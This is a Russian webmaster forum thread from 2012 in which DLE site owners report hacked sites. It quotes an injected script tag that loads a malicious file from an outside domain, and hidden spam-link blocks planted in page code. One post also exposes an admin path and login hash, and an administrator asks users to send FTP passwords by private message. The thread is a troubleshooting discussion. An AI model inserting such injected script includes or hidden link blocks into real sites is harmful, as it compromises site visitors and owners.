18 Ноября 2017, 13:28:53

Автор Тема: Вирус на сайте  (Прочитано 8376 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Lifeform

  • Гость
Вирус на сайте
« : 07 Октября 2012, 17:44:51 »
Нежданно-негаданно на сайте (gaemz.ru) появился вирус. KIS начал ругаться на то, что с сайта начинается загрузка какого-то вредоносного объекта.

Проверил исходный код в Chrome - нашел скрипт <script src="http://onedayoflife.ikwb.com/rsst.js"></script>.

Я проверил еще через SiteCheck и вывод был неутешителен - заражена не только главная, но и страницы категорий, логина и регистрации: http://sitecheck.sucuri.net/scanner/?scan=gaemz.ru

И вот не знаю, где в фтп его искать. Поможете?  :cry:

Оффлайн -DRUM-

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 2 560
  • Репутация: 182
  • Пол: Мужской
  • Поехали!
    • Бесплатный хостинг от "Интернет Обсерватории"
Re: Вирус на сайте
« Ответ #1 : 07 Октября 2012, 18:12:34 »
скрипт лежит не на сервере, там же ссылка написана _onedayoflife.ikwb.com/rsst.js
у вас просто идёт подключение этого скрипта в шаблоне сайта.

настоятельно советую поменять пароль на FTP  и правильно выставить права на запись CHMOD ну и естественно найти в шаблоне и вырезать подключение скрипта
« Последнее редактирование: 07 Октября 2012, 18:15:46 от -DRUM- »
billing.intobs.ru

Lifeform

  • Гость
Re: Вирус на сайте
« Ответ #2 : 07 Октября 2012, 18:28:16 »
естественно найти в шаблоне и вырезать подключение скрипта

Подскажите хоть, где, как искать? Пароли естественно буду менять, но пока нужно разобраться со скриптом.

Оффлайн karton247

  • Постоялец
  • ***
  • Сообщений: 238
  • Репутация: 6
  • Пол: Мужской
  • zetlex.ru
    • zetlex.ru
Re: Вирус на сайте
« Ответ #3 : 07 Октября 2012, 19:37:56 »
кстати, я у себя на сайте нашел кучу левых ссылок , типа

   
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><ul><li><a href="/forum/styles/glaza/krem-eliza-protiv-morschin.php">крем элиза против морщин</a></li><li><a href="/forum/styles/glaza/maska-dlya-glaz-ot-morschin.php">маска для глаз от морщин</a></li><li><a href="/forum/styles/omolojenie/payt-krem-protiv-morschin.php">payt крем против морщин</a></li><li><a href="/forum/styles/glaza/verpage.php">какое масло лучше от морщин</a></li><li><a href="/forum/styles/glaza/morschiny-kozhi-vokrug-glaz.php">морщины кожи вокруг глаз</a></li><li><a href="/forum/styles/glaza/krem-morschiny-vokrug-glaz.php">крем морщины вокруг глаз</a></li><li><a href="/forum/styles/omolojenie/elos-omolozhenie-ceny-kiev.php">элос омоложение цены киев</a></li><li><a href="/forum/styles/recepti/thalac-cena-stop-morschin.php">thalac цена стоп морщин</a></li><li><a href="/forum/styles/glaza/maska-vokrug-glaz-morschin.php">маска вокруг глаз морщин</a></li><li><a href="/forum/styles/glaza/vishi-krem-protiv-morschin.php">виши крем против морщин</a></li><li><a href="/forum/styles/koja/morschiny-zhirnaya-kozha-lica.php">морщины жирная кожа лица</a></li><li><a href="/forum/styles/recepti/krem-protiv-morschin-vishi.php">крем против морщин виши</a></li><li><a href="/forum/styles/omolojenie/ekstremalnoe-golodanie-s-celu-omolozheniya.php">экстремальное голодание с целью омоложения</a></li><li><a href="/forum/styles/glaza/morschiny-glaz-lechenie-v-domashnih-usloviyah.php">морщины глаз лечение в домашних условиях</a></li><li><a href="/forum/styles/glaza/luchshie-nochnye-krema-ot-morschin-posle-35-let.php">лучшие ночные крема от морщин после 35 лет</a></li><li><a href="/forum/styles/sredstva/massazh-tochek-na-lice-protiv-morschin.php">массаж точек на лице против морщин</a></li><li><a href="/forum/styles/recepti/bezvrednye-narodnye-recepty-ot-morschin.php">безвредные народные рецепты от морщин</a></li><li><a href="/forum/styles/glaza/maski-ot-morschin-vokrug-glaz-iz-ovoschey.php">маски от морщин вокруг глаз из овощей</a></li><li><a href="/forum/styles/glaza/kakie-masla-ot-morschin-glaz.php">какие масла от морщин глаз</a></li><li><a href="/forum/styles/maska/benita-kantieni-boremsya-s-morschinami.php">бенита кантиени. боремся с морщинами</a></li><li><a href="/forum/styles/maska/dnevnoy-krem-protiv-morschin-loreal.php">дневной крем против морщин loreal</a></li><li><a href="/forum/styles/maska/maska-dlya-lica-ot-morschin-iz-kurkumy.php">маска для лица от морщин из куркумы</a></li><li><a href="/forum/styles/recepti/kakoy-vybrat-krem-ot-morschin-do-35-let.php">какой выбрать крем от морщин до 35 лет</a></li><li><a href="/forum/styles/koja/kozha-morschinitsya-stala-i-suhaya.php">кожа морщинится стала и сухая</a></li><li><a href="/forum/styles/recepti/elitnaya-kosmetika-protiv-mimicheskih-morschin.php">элитная косметика против мимических морщин</a></li><li><a href="/forum/styles/glaza/glubokie-morschiny-vokrug-glaz.php">глубокие морщины вокруг глаз</a></li><li><a href="/forum/styles/omolojenie/sovety-po-omolozheniu-kozhi-lica.php">советы по омоложению кожи лица</a></li></ul></font>
<div id="loading-layer" style="display:none"><div id="loading-layer-text">Загрузка. Пожалуйста, подождите...</div></div>

а в шаблоне такого когда никак не могу найти, подскажите где подключается ( 96 строка в коде сайта)

и еще подскажите как убрать вот это с кода <!--
var dle_root       = '/';
var dle_admin      = 'kiberkarton.php';
var dle_login_hash = '0fd6ee9718f3da01f1f56cf50849a644';
var dle_group      = 1;
var dle_skin       = '4itak';
var dle_wysiwyg    = 'no';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить"];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_complaint  = 'Укажите текст вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной грамматической ошибке';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var dle_notice     = 'Уведомление автору';
var dle_p_text     = 'Введите текст уведомления автору статьи, которое он получит персональным сообщением:';
var dle_del_msg    = 'Да, и отправить уведомление';
var allow_dle_delete_news   = true;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
FastSearch();
});
$(function(){
$('pre code').each(function(i, e) {hljs.highlightBlock(e, null)});
});//-->

строки 98-135 на моем сайте
Создатель сайта http://kiberweb.ru и http://zetlex.ru/

Оффлайн -DRUM-

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 2 560
  • Репутация: 182
  • Пол: Мужской
  • Поехали!
    • Бесплатный хостинг от "Интернет Обсерватории"
Re: Вирус на сайте
« Ответ #4 : 07 Октября 2012, 19:53:07 »
естественно найти в шаблоне и вырезать подключение скрипта

Подскажите хоть, где, как искать? Пароли естественно буду менять, но пока нужно разобраться со скриптом.
в папке вашего шаблона. во всех файлах.

кстати, я у себя на сайте нашел кучу левых ссылок , типа

   
<font style="position: absolute;overflow: hidden;height: 0;width: 0"><ul><li><a href="/forum/styles/glaza/krem-eliza-protiv-morschin.php">крем элиза против морщин</a></li><li><a href="/forum/styles/glaza/maska-dlya-glaz-ot-morschin.php">маска для глаз от морщин</a></li><li><a href="/forum/styles/omolojenie/payt-krem-protiv-morschin.php">payt крем против морщин</a></li><li><a href="/forum/styles/glaza/verpage.php">какое масло лучше от морщин</a></li><li><a href="/forum/styles/glaza/morschiny-kozhi-vokrug-glaz.php">морщины кожи вокруг глаз</a></li><li><a href="/forum/styles/glaza/krem-morschiny-vokrug-glaz.php">крем морщины вокруг глаз</a></li><li><a href="/forum/styles/omolojenie/elos-omolozhenie-ceny-kiev.php">элос омоложение цены киев</a></li><li><a href="/forum/styles/recepti/thalac-cena-stop-morschin.php">thalac цена стоп морщин</a></li><li><a href="/forum/styles/glaza/maska-vokrug-glaz-morschin.php">маска вокруг глаз морщин</a></li><li><a href="/forum/styles/glaza/vishi-krem-protiv-morschin.php">виши крем против морщин</a></li><li><a href="/forum/styles/koja/morschiny-zhirnaya-kozha-lica.php">морщины жирная кожа лица</a></li><li><a href="/forum/styles/recepti/krem-protiv-morschin-vishi.php">крем против морщин виши</a></li><li><a href="/forum/styles/omolojenie/ekstremalnoe-golodanie-s-celu-omolozheniya.php">экстремальное голодание с целью омоложения</a></li><li><a href="/forum/styles/glaza/morschiny-glaz-lechenie-v-domashnih-usloviyah.php">морщины глаз лечение в домашних условиях</a></li><li><a href="/forum/styles/glaza/luchshie-nochnye-krema-ot-morschin-posle-35-let.php">лучшие ночные крема от морщин после 35 лет</a></li><li><a href="/forum/styles/sredstva/massazh-tochek-na-lice-protiv-morschin.php">массаж точек на лице против морщин</a></li><li><a href="/forum/styles/recepti/bezvrednye-narodnye-recepty-ot-morschin.php">безвредные народные рецепты от морщин</a></li><li><a href="/forum/styles/glaza/maski-ot-morschin-vokrug-glaz-iz-ovoschey.php">маски от морщин вокруг глаз из овощей</a></li><li><a href="/forum/styles/glaza/kakie-masla-ot-morschin-glaz.php">какие масла от морщин глаз</a></li><li><a href="/forum/styles/maska/benita-kantieni-boremsya-s-morschinami.php">бенита кантиени. боремся с морщинами</a></li><li><a href="/forum/styles/maska/dnevnoy-krem-protiv-morschin-loreal.php">дневной крем против морщин loreal</a></li><li><a href="/forum/styles/maska/maska-dlya-lica-ot-morschin-iz-kurkumy.php">маска для лица от морщин из куркумы</a></li><li><a href="/forum/styles/recepti/kakoy-vybrat-krem-ot-morschin-do-35-let.php">какой выбрать крем от морщин до 35 лет</a></li><li><a href="/forum/styles/koja/kozha-morschinitsya-stala-i-suhaya.php">кожа морщинится стала и сухая</a></li><li><a href="/forum/styles/recepti/elitnaya-kosmetika-protiv-mimicheskih-morschin.php">элитная косметика против мимических морщин</a></li><li><a href="/forum/styles/glaza/glubokie-morschiny-vokrug-glaz.php">глубокие морщины вокруг глаз</a></li><li><a href="/forum/styles/omolojenie/sovety-po-omolozheniu-kozhi-lica.php">советы по омоложению кожи лица</a></li></ul></font>
<div id="loading-layer" style="display:none"><div id="loading-layer-text">Загрузка. Пожалуйста, подождите...</div></div>
удаляется точно также как описано выше.



и еще подскажите как убрать вот это с кода <!--
var dle_root       = '/';
var dle_admin      = 'kiberkarton.php';
var dle_login_hash = '0fd6ee9718f3da01f1f56cf50849a644';
var dle_group      = 1;
var dle_skin       = '4itak';
var dle_wysiwyg    = 'no';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить"];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_complaint  = 'Укажите текст вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной грамматической ошибке';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var dle_notice     = 'Уведомление автору';
var dle_p_text     = 'Введите текст уведомления автору статьи, которое он получит персональным сообщением:';
var dle_del_msg    = 'Да, и отправить уведомление';
var allow_dle_delete_news   = true;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
FastSearch();
});
$(function(){
$('pre code').each(function(i, e) {hljs.highlightBlock(e, null)});
});//-->

строки 98-135 на моем сайте
это не нужно убирать, это служебная информация которую движок выводит для работы
« Последнее редактирование: 07 Октября 2012, 19:54:22 от -DRUM- »
billing.intobs.ru

Оффлайн THY

  • Старожил
  • ****
  • Сообщений: 257
  • Репутация: 3
  • Пол: Мужской
Re: Вирус на сайте
« Ответ #5 : 07 Октября 2012, 20:58:55 »
Начитался тут про ваши вирусы... и решил тоже проверить... и вылезло вот такое:
Цитировать
<div style="display:none;">������������ <a href="http://template-dle.ru/" target="_blank">������� DLE[/url] ������� ��������� ��� dle.</div> <div style="display:none;">����������� <a href="http://joomla-skins.ru/" target="_blank">������� joomla[/url] ������� ��������� ��� Joomla.</div> <div style="display:none;">���������� <a href="http://wordpressstyle.ru/" target="_blank">���� wordpress[/url] � ������� ���������.</div> <div style="display:none;">���������� <a href="http://fanclubmania.ru" >���� ������[/url] ��� ��������� ������.</div> <div style="display:none;">���������� <a href="http://radioto4ka.ru" target="_blank">����� ������[/url] ������� ����� ������.</div> <div style="display:none;">������ <a href="http://samclubrussia.ru" target="_blank">�����������[/url] �� ����� �����.</div> <div style="display:none;">����������� <a href="http://obrazcy-dogovorov.ru" target="_blank">������� ���������[/url] � ����������������.</div> <div style="display:none;">����� ����� <a href="http://photoshop4all.ru" target="_blank">������� �������[/url] � ������ ��������� ��� �������.</div> <div style="display:none;">����������� <a href="http://mymultik.ru" >��������[/url] ������� � �������� ������.</div> <div style="display:none;">����������� <a href="http://diavent.ru" >�������� ������������[/url] ��� �������� ����.</div> <div
Это только кусочек из всего http://sitecheck.sucuri.net/results/8-win.ru
Такая гадость оказалась в базе. Удалил это все, но при проверке на sitecheck.sucuri.net  все равно выдает такую гадость. Может кто знает где еще может оно сидеть?  :)
-- Последняя стадия офигевания на работе от безделья:
- Так-с....Спам.....почитаем.....

Оффлайн karton247

  • Постоялец
  • ***
  • Сообщений: 238
  • Репутация: 6
  • Пол: Мужской
  • zetlex.ru
    • zetlex.ru
Re: Вирус на сайте
« Ответ #6 : 07 Октября 2012, 21:28:43 »
а я чист ) http://sitecheck.sucuri.net/results/kiberweb.ru/

и про те ссылки, в файлах шаблона их нет , я вот думаю вм в файлах двига они где то?
Создатель сайта http://kiberweb.ru и http://zetlex.ru/

Оффлайн THY

  • Старожил
  • ****
  • Сообщений: 257
  • Репутация: 3
  • Пол: Мужской
Re: Вирус на сайте
« Ответ #7 : 07 Октября 2012, 21:33:41 »
а я чист ) http://sitecheck.sucuri.net/results/kiberweb.ru/

и про те ссылки, в файлах шаблона их нет , я вот думаю вм в файлах двига они где то?
9.7 dle? её вроде еще не загадили так как 9.6  :D
Файлы чистые, все перелопатил  :bicycle:
« Последнее редактирование: 07 Октября 2012, 21:34:30 от THY »
-- Последняя стадия офигевания на работе от безделья:
- Так-с....Спам.....почитаем.....

Оффлайн karton247

  • Постоялец
  • ***
  • Сообщений: 238
  • Репутация: 6
  • Пол: Мужской
  • zetlex.ru
    • zetlex.ru
Re: Вирус на сайте
« Ответ #8 : 07 Октября 2012, 22:49:41 »
да нет у меня 9.6
Создатель сайта http://kiberweb.ru и http://zetlex.ru/

Оффлайн -DRUM-

  • Администратор
  • Ветеран
  • *****
  • Сообщений: 2 560
  • Репутация: 182
  • Пол: Мужской
  • Поехали!
    • Бесплатный хостинг от "Интернет Обсерватории"
Re: Вирус на сайте
« Ответ #9 : 07 Октября 2012, 23:35:14 »
 ну вот нафига вы гонитесь ставить новые версии движка??
чем новее версия, тем больше в ней дырок! в старых версиях всё пофиксили. у меня на одном из сайтов вообще стоит то ли 8,2 то ли 8,5 и ни разу не было ни взлома ни чего-то что можно назвать вторжением.
пишите в личку данные по FTP (пароль и название сайта), завтра на работе если делать будет нечего - гляну, повырезаю ваши блядоссылки.
billing.intobs.ru

Оффлайн BAKS1K

  • Постоялец
  • ***
  • Сообщений: 172
  • Репутация: 7
  • Пол: Мужской
    • Создай Свой Игровой Сервер с www.valve-server.ru
Re: Вирус на сайте
« Ответ #10 : 08 Октября 2012, 16:23:08 »
Народ, кстати в некоторых новых версиях DLE в файле index.php прописан вредностный код, из за которого в БД висят ссылки. Я как-то уже создавал тему на форуме, мне конечно толкового не предложили. Но я потом все файлы перебирал, и в этом index.php примерно в середине файла такая дрянь сидела. Удалил и всё отлично стало. А произошло это как раз после обновления на новую версию. Больше не обновляю из-за этого  :)